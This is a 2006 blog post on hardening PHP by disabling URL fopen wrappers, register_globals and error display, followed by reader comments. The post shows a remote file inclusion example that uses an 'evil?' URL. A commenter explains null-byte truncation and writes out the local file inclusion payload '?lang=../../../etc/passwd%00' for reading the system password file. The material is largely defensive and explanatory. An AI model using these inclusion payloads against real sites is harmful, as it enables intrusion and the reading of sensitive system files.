2 Easy Steps to Increase Security in PHP
I get a lot of questions regarding how to increase security in their PHP App.
Aside from the obvious, write secure code; there are two easy “switches that you can flick”.
Disable: URL fopen wrappers
This will prevent most exploitations of the classic File Inclusion Vulnerability.
eg. include($foo.’bar.php’);
Now if $foo is set to ‘http://www.stevenroddis.com/evil?’
The script grabs PHP code from “http://www.stevenroddis.com/evil?bar.php”
But if URL fopen wrappers if off, then the hacker can only use files on your server. (Still with limitations such as the appending string)
However there is a downside to this some applications may use url wrappers to download data off the web, you can work around it by using curl, but you might not want to.
How?
php.ini (most people won’t have access to this)
allow_url_fopen off
.htaccess
php_flag allow_url_fopen off
Turn Off: Register Globals
Yes, it is off by default but the number of sites that get hacked due to it being on is astounding. Register Globals is not needed in 99.99% of PHP apps.
How?
php.ini (most people won’t have access to this)
register_globals off
.htaccess
php_flag register_globals off
#3 Bonus: Turn off Error Reporting
A lot of sites show sensitive information can make it easier to find a security hold and/or exploit it.
How?
php.ini (most people won’t have access to this)
display_errors Off
.htaccess
php_flag display_errors Off
Enforce these in your web app:
Don’t let stupid configuration changes bring down your defences, inside your php application make sure you die() and give some [nice] error, when say register globals is turned back on.
Code:
if (@ini_get(’register_globals’))
{
die();
}
You might want to do it also for allow_url_fopen (replace “register_globals” in the above with “allow_url_fopen”).
There you have it two (well four) easy and simple steps to greatly increase security in your PHP application. (Three of them don’t require changing your code)
Regards,
Steven Roddis
r0ut3r said,
October 17, 2006 @ 9:51 am
“But if URL fopen wrappers if off, then the hacker can only use files on your server. (Still with limitations such as the appending string)” - Not if you stop it midway through the include…
Steven Roddis said,
October 17, 2006 @ 4:35 pm
And how are you going to do that?
$foo = ‘bar’;
include(’/file.txt’.$foo);
??
r0ut3r said,
November 5, 2006 @ 10:48 am
i was under the impression you were refering to this:
eg. include($foo.’bar.php’);
————————–
Now if $foo is set to ‘http://www.stevenroddis.com/evil?’
The script grabs PHP code from “http://www.stevenroddis.com/evil?bar.php”
————————–
meaning you would need to have a file named “evil?bar.php”, but this is not the case, just inject a null value to make it stop half way through the include statement.
And when you say “(Still with limitations such as the appending string)” - no need to worry about appending string if you use the method i described above ;)
That should help, if not, just send me an email. writ3r [ at ] gmail.com
Steven Roddis said,
November 5, 2006 @ 11:00 am
“meaning you would need to have a file named “evil?bar.php”, but this is not the case, just inject a null value to make it stop half way through the include statement.”
The ? in url starts the query string.
Ie. http://www.stevenroddis.com/evil.txt?87as
== http://www.stevenroddis.com/evil.txt
r0ut3r said,
November 14, 2006 @ 9:17 pm
“The ? in url starts the query string.
Ie. http://www.stevenroddis.com/evil.txt?87as
== http://www.stevenroddis.com/evil.txt ”
Yes, but thats not what i am talking about.
Say you have a local file include vuln, like these ones:
http://milw0rm.com/exploits/2768
You see the vulnerable code there? And you see it adds .language.php on the end of the file?
.$setLang.’.language.php’);
So if you just did a request like:
?lang=../../../etc/passwd
it will try and read the file:
/etc/passwd.language.php
Now thats going to create a problem and render this exploit practically useless.
Now to the point, with a little background. In many programming languages you can use null characters to do stuff, depending on what you need it to do, in C you use , and in PHP we use %00. Now what a null byte actually does, and is commonly used for is stopping a string or function midway. Note: I’ve only used a null byte in C once, and it was for an authentication script where i was trying to prevent some form of vulnerability, can’t remember, awhile ago. I’ve never used it in PHP except to assist in exploitation. So back to the example; to stop the script from adding .language.php onto the end, it must be stopped half way. Therefore…
We will inject a null byte and stop it half way, preventing .language.php from being added, to do this it is done like so:
?lang=../../../etc/passwd%00
Does this make sense now?
r0ut3r (writ3r [ at ] gmail.com)
r0ut3r said,
November 15, 2006 @ 11:41 pm
you gonna find this interesting, heh:
—————————————
################################################################################################# #
# r0ut3r Presents… #
# #
# Another r0ut3r discovery! #
# #
# TorrentFlux 2.2 Arbitrary File Creation/Overwrite/Deletion & Command Execution Vulnerablities #
# #
#################################################################################################
It’ll be on my site. :)
r0ut3r.